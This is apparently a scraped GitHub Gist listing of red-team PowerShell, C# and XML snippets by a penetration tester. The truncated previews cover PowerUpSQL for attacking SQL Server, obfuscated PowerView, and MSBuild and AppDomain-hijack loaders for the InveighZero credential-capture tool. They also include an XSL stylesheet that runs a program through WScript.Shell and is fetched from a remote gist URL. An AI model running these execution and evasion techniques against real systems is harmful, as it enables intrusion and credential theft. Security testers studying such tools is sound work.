Scott Sutherland (nullbind)
MiniPowerUpSQL.psm1
function Get-DomainObject
{
[CmdletBinding()]
Param(
[Parameter(Mandatory = $false,
HelpMessage = 'Domain user to authenticate with domain\user.')]
[string]$Username,
[Parameter(Mandatory = $false,
HelpMessage = 'Domain password to authenticate with domain\user.')]
nullbind / Get-SmbShareInventory.psm1
Last active Aug 20, 2020
Get-SmbShareInventory.ps1
#--------------------------------------
# Function: Get-SMBShareInventory
#--------------------------------------
# Author: Scott Sutherland, 2020 NetSPI
# References: This script includes code taken and modified from the open source projects PowerView, Invoke-Ping, and Invoke-Parallel.
function Get-SMBShareInventory
{
<#
.SYNOPSIS
nullbind / PowerUpSQL-Dc-Without-Creds.ps1
Created Jun 30, 2020
PowerUpSQL-Dc-Without-Creds.ps1
#requires -version 2
<#
File: PowerUpSQL.ps1
Author: Scott Sutherland (@_nullbind), NetSPI - 2020
Major Contributors: Antti Rantasaari and Eric Gruber
Version: 1.106
Description: PowerUpSQL is a PowerShell toolkit for attacking SQL Server.
License: BSD 3-Clause
Required Dependencies: PowerShell v.2
Send-ProtocolHandlerEmailLinks.psm1
xsl-notepad.xsl
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
return nodelist.nextNode().xml;
xsl-notepad.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
nullbind / Obfuscated-PowerView-Example.psm1
Last active May 21, 2020
Obfuscated-PowerView-Example.psm1
function New-InMemoryModule
{
Param
(
[Parameter(Position = 0)]
[ValidateNotNullOrEmpty()]
[String]
$ModuleName = [Guid]::NewGuid().ToString()
)
nullbind / Inveigh-AppDomain-Hijack.cs
Created May 20, 2020
Inveigh-AppDomain-Hijack.cs
/*
AppDomain Hijacking Execution Method
File: Inveigh-AppDomain-Hijack.cs
Author: Kevin Robertson
Description
This file can be used to execute InveighZero through MSBuild.
Original Repository: https://github.com/Kevin-Robertson/InveighZero
Note: The reflection technique used to load the inveighzero.exe from a string was based on
nullbind / Get-ProtocolHandle.ps1
Last active May 8, 2020
Get-ProtocolHandle.ps1
# based on: https://msrc-blog.microsoft.com/2008/12/09/ms08-075-reducing-attack-surface-by-turning-off-protocol-handlers/
# https://blogs.msdn.microsoft.com/noahc/2006/10/19/register-a-custom-url-protocol-handler/
# https://zero.lol/2019-05-22-fun-with-uri-handlers/
# https://www.vdoo.com/blog/exploiting-custom-protocol-handlers-in-windows
# https://docs.microsoft.com/en-us/windows/win32/shell/app-registration
# https://docs.microsoft.com/en-us/windows/win32/shell/fa-intro
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
# jnlp:file://///server/file.txt
$null = $DataTable = New-Object System.Data.DataTable;
nullbind / inveigh.xml
Created May 6, 2020
Payload to execute InveighZero through MSBuild.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--
File: Inveigh.xml
Author: Kevin Robertson
Description
This file can be used to execute InveighZero through MSBuild.
Original Repository: https://github.com/Kevin-Robertson/InveighZero
Using msbuild.exe to execute .net code through inline tasks is a technique that
was developed by Casey Smith. You can explicitly